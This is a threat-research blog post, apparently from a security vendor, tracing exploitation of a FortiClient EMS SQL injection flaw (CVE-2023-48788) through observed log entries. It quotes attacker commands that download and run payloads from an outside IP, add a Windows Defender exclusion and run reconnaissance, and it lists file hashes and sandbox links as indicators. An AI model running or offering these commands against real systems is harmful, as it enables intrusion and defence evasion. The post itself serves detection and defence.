Despite being a 20-year-old and well-known attack technique, SQL injection remains a prominent vector for threat actors to exploit today’s organizations. Case in point, attackers continue to exploit the documented Fortinet FortiClient EMS Vulnerability, CVE-2023-48788, using SQL injection as the primary incursion point.
Todyl’s Threat Research team recently noticed the attack vector while evaluating a partner’s log data. Let’s explore the attack’s process, outcomes, and techniques you can use to defend against it.
The Todyl team initially saw a log come in from a partner’s Fortinet FortiClient device showing the following parent process:
"C:\Program Files\Microsoft SQL Server\MSSQL14.FCEMS\MSSQL\Binn\sqlservr.exe" -sFCEMS
Seemingly out of the ordinary, our team investigated further. The main process that really caught our attention was:
"C:\Windows\system32\cmd.exe" /c POWERSHELL.EXE WGET HTTP://196.251.70.167/FR.JS -OUTFILE BVER.BAT
This indicated, based off of the parent process, that it was a SQL injection attack, per CVE-2023-48788. The parent process then spawned a command shell, which executed PowerShell to pull down a JavaScript file and save it as a batch file.
Next, the attacker ran the exploit again as evidence points to the same parent process mentioned above. This time, however, the attacker is using command shell to execute the BVER.BAT file:
"C:\Windows\system32\cmd.exe" /c CMD.EXE /C BVER.BAT
When this batch file is executed, it launches the following command:
powershell.exe "Add-MpPreference -ExclusionPath 'C:\ProgramData\Temp'"
The command adds an exclusion to Windows Defender for the C:\ProgramData\Temp directory. This means that Windows Defender will no longer scan that directory or alert to anything malicious in that directory. The technique has been used recently in a different campaign uncovered by the Todyl team:
https://www.todyl.com/blog/threat-advisory-lightperlgirl-malware
The second stage of the attack starts off with the following command, which is still part of the execution of BVER.BAT file:
powershell.exe "wget http://196.251.70.167/responses.xml -outfile audiodg.exe; .\audiodg.exe"
Once again, the command uses PowerShell to pull down a malicious file from the previous IP address. This time, however, the script downloads responses.xml but saves it as an executable file. After downloading and saving the file audiodg.exe, it executes it.
The third stage now involves audiodg.exe being used to execute commands on the system. All third stages commands have the parent process of:
C:\ProgramData\Temp\audiodg.exe
The attacker first executes tasklist to see what tasks are running on the system.
cmd /c tasklist
Then, they proceed to download another stage of the malware from the same IP address.
cmd /c curl -k https://196.251.70.167/version2.js --output rpcwa.exe
Finally, the attacker issues another recon command.
cmd /c dir
From this point, the bad actor can execute other commands as necessary, but with their malware payload downloaded, they can progress further through the attack lifecycle towards their end goal.
The Todyl team recommends the following actions to prevent potential compromise:
audiodg.exe
https://tria.ge/250607-dppv3a1pz5
https://www.virustotal.com/gui/file/2ddb34438d62b0112bc19e03f51c38a72d8c18164208083d98fe9114b6c01ef6
SHA256: 2ddb34438d62b0112bc19e03f51c38a72d8c18164208083d98fe9114b6c01ef6
rpcwa.exe (SharpChisel)
https://www.virustotal.com/gui/file/4619ec1f2bda278722a8ee852a7df3bd0a98311b11e227a63d9c948f73a39b79
SHA256: 4619ec1f2bda278722a8ee852a7df3bd0a98311b11e227a63d9c948f73a39b79
https://redcanary.com/blog/threat-intelligence/cve-2023-48788/
